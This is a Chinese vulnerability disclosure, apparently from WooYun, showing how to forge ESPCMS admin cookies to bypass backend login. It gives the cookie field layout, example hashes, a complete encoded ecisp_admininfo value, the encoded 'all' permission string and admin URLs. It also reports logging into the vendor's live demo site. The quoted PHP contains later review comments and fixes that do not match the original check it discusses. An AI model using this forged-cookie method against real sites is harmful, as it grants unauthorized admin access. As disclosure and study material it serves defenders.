### 简要描述:
ESPCMS 权限限定绕过直接登录后台
仅测试了最新版本
然后demo测试进去看了一眼,别的什么也没做。
### 详细说明:
先看下 后台验证的代码
```
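/**
 * Bootstraps the admin runtime: database, command includes, system files and
 * cache, then (optionally) the admin permission gate, output buffering, the
 * site-closed gate and the admin language pack.
 *
 * @param bool $admin_purview When true, admin_purview() runs first and the
 *                            requested action is checked against
 *                            $this->esp_powerlist before anything else happens.
 */
function softbase($admin_purview = false) {
    header("Content-Type: text/html; charset=utf-8");
    $this->dbmysql();
    $this->commandinc();
    $this->systemfile();
    $this->cachedb();

    if ($admin_purview) {
        // admin_purview() fills $this->esp_powerlist from the esp_powerlist
        // cookie, so this gate is only as trustworthy as that cookie's encoding.
        $this->admin_purview();
        $this->sitelng = $this->getlng();
        $action = $this->fun->accept('action', 'R');
        // Refuse the action when it appears in the list and the list does not
        // carry the 'all' entry. Loose in_array() kept on purpose: a missing
        // action and an empty list entry compare equal here, and making the
        // match strict would change which requests are refused — confirm before
        // tightening.
        if (in_array($action, $this->esp_powerlist) && !in_array('all', $this->esp_powerlist)) {
            exit('Permissions errors');
        }
    }

    // The original tested !function_exists('ob_gzhandler'), which would install
    // a handler that does not exist; gzip buffering is only usable when the
    // handler is available.
    if ($this->CON['is_gzip'] == 1 && function_exists('ob_gzhandler')) {
        ob_start('ob_gzhandler');
    } else {
        ob_start();
    }

    // NOTE(review): $runpage was read here before any assignment, so the
    // is_close gate could never fire. It is initialised to false to keep that
    // behaviour without an undefined-variable notice; the assignment at the end
    // of this function suggests it was meant to be a property or a parameter
    // — confirm the intended gate before enabling it.
    $runpage = false;
    if ($runpage && $this->CON['is_close']) {
        exit($this->CON['close_content']);
    }

    if (!admin_FROM) {
        // Language file defines $ST; copy it onto the object and drop the local.
        include admin_ROOT . adminfile . '/include/admin_language_' . db_lan . '.php';
        $this->lng = $ST;
        unset($ST);
    } else {
        $lngpack = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
        // NOTE(review): when creat_lanpack() fails, $LANPACK is never defined
        // and $this->lng becomes null — confirm whether callers tolerate that.
        if ($this->creat_lanpack($lngpack)) {
            include admin_ROOT . 'datacache/' . $lngpack . '_pack.php';
        }
        $this->lng = $LANPACK;
        $runpage = true;
    }
}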
```
调用了下面的函数。
$this->admin_purview();
然后继续查看代码
```
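/**
 * Rebuilds the admin identity from the ecisp_admininfo and esp_powerlist
 * cookies and redirects to the login page when that identity fails the checks.
 *
 * Trust boundary, as the visible code establishes it: both inputs are read from
 * cookies (accept(..., 'C')), decoded with db_pscode and split on '|'. The only
 * integrity checks compare md5(admin_AGENT) and md5(admin_ClassURL) with fields
 * of the same cookie, and admin_AGENT / admin_ClassURL are themselves derived
 * from request headers (User-Agent, Host, PHP_SELF). The esp_password field is
 * stored but never compared. The check therefore holds only while db_pscode
 * stays secret; the hardening below (tolerant parsing, type-strict constant-time
 * hash comparison) does not change that — a server-side session or database
 * lookup of the admin record is what would remove the reliance on the cookie.
 *
 * Side effects: sets esp_powerlist, esp_username, esp_password, esp_useragent,
 * esp_softurl, esp_adminuserid, esp_inputclassid and esp_powerid on $this, and
 * may emit a Location header and exit.
 */
function admin_purview() {
    // Both request shapes read the same two cookies; the only difference is that
    // the User-Agent check is skipped for filemanage/batupfilesave (presumably
    // because that upload arrives with a different User-Agent — confirm).
    $checkAgent = !($this->fun->accept('archive', 'R') === 'filemanage'
        && $this->fun->accept('action', 'R') === 'batupfilesave');

    $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C');
    $esp_powerlist = $this->fun->accept('esp_powerlist', 'C');

    // Pad to the seven expected fields so a short or malformed cookie yields
    // empty strings instead of undefined-offset warnings and null properties.
    $arr_purview = array_pad(
        explode('|', (string) $this->fun->eccode($ecisp_admininfo, 'DECODE', db_pscode)),
        7,
        ''
    );
    $this->esp_powerlist = explode('|', (string) $this->fun->eccode($esp_powerlist, 'DECODE', db_pscode));

    list($esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $esp_powerid, $esp_inputclassid, $this->esp_softurl) = $arr_purview;
    $this->esp_adminuserid = intval($esp_adminuserid);
    $this->esp_inputclassid = intval($esp_inputclassid);
    $this->esp_powerid = intval($esp_powerid);

    // hash_equals() is type-strict and constant-time; the original loose '!='
    // compared hash strings with PHP's numeric-string rules.
    $urlOk = hash_equals(md5(admin_ClassURL), (string) $this->esp_softurl);
    $agentOk = !$checkAgent || hash_equals(md5(admin_AGENT), (string) $this->esp_useragent);

    // 0 = not authenticated, 1 = authenticated (kept as ints for the callers' sake).
    $condition = (empty($this->esp_username) || empty($this->esp_adminuserid) || !$urlOk || !$agentOk) ? 0 : 1;

    if ($condition == 0) {
        // NOTE(review): the redirect is suppressed when EITHER archive=adminuser
        // OR action=login is present (De Morgan of the two '!=' terms); if the
        // intent was "only the login page itself", this should be '||' — confirm.
        if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') {
            header('location: index.php?archive=adminuser&action=login');
            exit();
        }
    } else {
        // Authenticated request with no target: send it to the management tab.
        if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') {
            header('location: index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter');
            exit();
        }
    }
}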
```
然后重点验证的是下面的代码
```
if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl)
```
$this->esp_username和$this->esp_adminuserid 可以在cookies中伪造。
而后面的 两个常量如下
```
admin_AGENT
define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']);
admin_ClassURL
define('admin_ClassURL', 'http://' . $_SERVER['HTTP_HOST'] . substr($_SERVER['PHP_SELF'], 0, strrpos($_SERVER['PHP_SELF'], '/')) . '/');
```
可见,可进行伪造。
再来说下查看key
直接可以看索马里大牛的http://wooyun.org/bugs/wooyun-2010-062528
这里就不多说了。
来张截图进行下示例。
[<img src="https://images.seebug.org/upload/201410/042018030326d7abfec8af3402fae0eb85796811.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/042018030326d7abfec8af3402fae0eb85796811.png)
出来之后,再挨个进行加密解密测试。
最终可以得出key
### 漏洞证明:
下面我们开始伪造
cookies中ecisp_admininfo的加密前值如下。
```
1|admin|md5(password)|md5(admin_AGENT)|1|1|md5(admin_ClassURL)
```
下面我拿测试用的agent和classurl进行演示
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
加密之后
efdd8e8dfc89de8875254f2e96f2eeb2
http://192.168.1.107/adminsoft
加密之后
962c6fbd63e97c6d6db74449a6bef874
password不进行验证,随便输入个wooyun
加密之后
fbb204a4061ffbd41284a84c258c1bfb
然后填充进去
```
1|admin|fbb204a4061ffbd41284a84c258c1bfb|efdd8e8dfc89de8875254f2e96f2eeb2|1|1|962c6fbd63e97c6d6db74449a6bef874
```
加密
```
Zq-XmKLPoa3LlJWUYpqVbWecaJybxspoZWRtZ5dsacllZp2VZMSYyLCencqbbpqcypqXam6Xm2xtnWhjmmaZlJefap9py5yYZ-CXsGWubmlol2vMlZWbZZibaclqnW3KmW1pmJptlWiXmJxsbJo
```
然后我们可以得出cookies的设定值
ecisp_admininfo 设定为
Zq-XmKLPoa3LlJWUYpqVbWecaJybxspoZWRtZ5dsacllZp2VZMSYyLCencqbbpqcypqXam6Xm2xtnWhjmmaZlJefap9py5yYZ-CXsGWubmlol2vMlZWbZZibaclqnW3KmW1pmJptlWiXmJxsbJo
esp_powerlist 设定为 all 的加密lp-i
managementloglistpgid 设定为0
managementmangerlistpgid 设定为0
开始进行伪造管理员
我们先打开
```
http://192.168.1.107/adminsoft/index.php
```
这个页面 然后开始填充cookies
[<img src="https://images.seebug.org/upload/201410/0420231659b0a11c6eaddcc9f2314e84bfc01895.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/0420231659b0a11c6eaddcc9f2314e84bfc01895.png)
然后访问下面的url
```
http://192.168.1.107/adminsoft/index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter
```
[<img src="https://images.seebug.org/upload/201410/04202343efcb5300ddcde3e099d432d4c8595d11.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/04202343efcb5300ddcde3e099d432d4c8595d11.png)
好了下面我们来说下demo的
先注册个帐号。
[<img src="https://images.seebug.org/upload/201410/04202410245b45190f2094bb7412fb3996a93782.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/04202410245b45190f2094bb7412fb3996a93782.png)
然后 翻来覆去 获得key
b16dd02887<马赛克>eabab<马赛克>
然后我们访问
```
http://demo.ecisp.cn/adminsoft
```
再生成cookies
访问
```
http://demo.ecisp.cn/adminsoft/index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter
```
[<img src="https://images.seebug.org/upload/201410/042026237ad4bc7f8a35d32a51df7051f01d40dd.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/042026237ad4bc7f8a35d32a51df7051f01d40dd.png)